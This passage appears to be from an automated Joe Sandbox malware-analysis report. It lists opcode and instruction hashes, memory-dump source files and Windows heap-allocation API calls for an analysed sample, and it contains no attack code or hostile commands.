                                        • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                        • Instruction ID: e3983b0b46e150881e6b875a5e69506901cf1ef8294e1c2d5c2dc7b24bad2592
                                        • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                        • Instruction Fuzzy Hash: 5B318E31B0CA4286EB64BF56B8406B8F6A6EF54B60FD44031DF6D46291FF2CEA41C760
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                         • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 3$3
                                        • API String ID: 0-2538865259
                                        • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                        • Instruction ID: d01a1294a90a065e0ce05ce44228ea3a66c0576e4ddf5f2f6594be908194d599
                                        • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                        • Instruction Fuzzy Hash: 49012331F0E5828AF354AF629884278FA60BB903B1FD84135CE2E815E1FF2D6685C761
                                        APIs
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD4906D6
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD4906F0
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD49074D
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD490762
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                         • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$AllocProcess
                                        • String ID:
                                        • API String ID: 1617791916-0
                                        • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                        • Instruction ID: 978296a0645cc9082028aae0f707cabe213949a83b6708db2184f0fb3dfc7a9d
                                        • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                        • Instruction Fuzzy Hash: 8A416832B0D64286EA14AF12E444579FBA6EF85BA1BC88034DF6E03750EF3DE641C760